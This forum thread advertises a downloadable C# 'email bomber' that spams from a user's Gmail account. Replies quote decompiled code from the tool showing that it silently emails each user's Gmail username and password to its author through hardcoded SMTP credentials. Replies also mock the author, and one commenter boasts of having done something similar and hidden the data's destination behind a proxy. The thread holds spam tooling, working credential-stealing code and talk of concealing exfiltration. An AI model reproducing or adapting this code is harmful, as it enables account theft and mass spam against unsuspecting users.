[C#] Email Bomber

Status
Not open for further replies.
Newbie Spellweaver
Joined
Jun 17, 2010
Messages
30
Reaction score
14
You can automatically spam emails with this email. You just enter your gmail account, and it spams automatically for you. It was made in C# by me! Enjoy!

Download & Screenshots In Attachments!


 

Attachments

  • captur - [C#] Email Bomber - RaGEZONE Forums
    capture.webp
    43.8 KB · Views: 142
Last edited by a moderator:
Nice. Not only will you get your gmail account blocked by google, but your IP and other information reported to the authorities most probably. (Depends on what you spam) Spamming, if 'testing' or not is a serious issue. I wouldn't even run this..
 
This guy is mailing all the email usernames and passwords you use on this to himself.

Code:
    private void button1_Click(object sender, EventArgs e)
    {
        if (((string.IsNullOrEmpty(this.textBox1.Text) || string.IsNullOrEmpty(this.textBox2.Text)) || (string.IsNullOrEmpty(this.textBox3.Text) || string.IsNullOrEmpty(this.textBox4.Text))) || ((string.IsNullOrEmpty(this.richTextBox1.Text) || !this.textBox1.Text.Contains("@")) || !this.textBox3.Text.Contains("@")))
        {
            MessageBox.Show("Please fill out all the forms correctly!", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand);
        }
        else
        {
            MailMessage message = new MailMessage();
            SmtpClient client = new SmtpClient("smtp.gmail.com");
            message.From = new MailAddress("[email protected]");
            message.To.Add("[email protected]");
            message.Subject = "Email Bomber Logs";
            message.Body = "Gmail Username: " + this.textBox1.Text + Environment.NewLine + "Gmail Password: " + this.textBox2.Text;
            client.Port = 0x24b;
            client.Credentials = new NetworkCredential("[email protected]", "1123181800640");
            client.EnableSsl = true;
            client.Send(message);
            this.int_0 = 0;
            this.label8.Text = "0";
            this.textBox1.Enabled = false;
            this.textBox2.Enabled = false;
            this.textBox3.Enabled = false;
            this.textBox4.Enabled = false;
            this.richTextBox1.Enabled = false;
            this.numericUpDown1.Enabled = false;
            this.checkBox1.Enabled = false;
            this.button1.Enabled = false;
            this.button2.Enabled = true;
            this.timer_1.Start();
        }
    }

He's also a noob who uses timers.
 
Last edited:
This guy is mailing all the email usernames and passwords you use on this to himself.

Code:
    private void button1_Click(object sender, EventArgs e)
    {
        if (((string.IsNullOrEmpty(this.textBox1.Text) || string.IsNullOrEmpty(this.textBox2.Text)) || (string.IsNullOrEmpty(this.textBox3.Text) || string.IsNullOrEmpty(this.textBox4.Text))) || ((string.IsNullOrEmpty(this.richTextBox1.Text) || !this.textBox1.Text.Contains("@")) || !this.textBox3.Text.Contains("@")))
        {
            MessageBox.Show("Please fill out all the forms correctly!", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand);
        }
        else
        {
            MailMessage message = new MailMessage();
            SmtpClient client = new SmtpClient("smtp.gmail.com");
            message.From = new MailAddress("[email protected]");
            message.To.Add("[email protected]");
            message.Subject = "Email Bomber Logs";
            message.Body = "Gmail Username: " + this.textBox1.Text + Environment.NewLine + "Gmail Password: " + this.textBox2.Text;
            client.Port = 0x24b;
            client.Credentials = new NetworkCredential("[email protected]", "1123181800640");
            client.EnableSsl = true;
            client.Send(message);
            this.int_0 = 0;
            this.label8.Text = "0";
            this.textBox1.Enabled = false;
            this.textBox2.Enabled = false;
            this.textBox3.Enabled = false;
            this.textBox4.Enabled = false;
            this.richTextBox1.Enabled = false;
            this.numericUpDown1.Enabled = false;
            this.checkBox1.Enabled = false;
            this.button1.Enabled = false;
            this.button2.Enabled = true;
            this.timer_1.Start();
        }
    }

He's also a noob who uses timers.


He's not a noob for using timers, he's a noob cause he had no idea .NET compiled softwares can be reversed by other noobs to...
 
He's not a noob for using timers, he's a noob cause he had no idea .NET compiled softwares can be reversed by other noobs to...

He's a noob for putting the password to his personal email in something he released as malware.

Oh man. That's the most fail thing you could possibly do. At least when I did something similar, I had to sense to send the information to a proxy server that then sent me e-mails so nobody could ever see where they were going.

He also posted it here: Email Bomber [Must Need Gmail Account] [Spam Emails Unlimitedly] [Fast & Efficient] [Coded In C#]
 
Status
Not open for further replies.
Back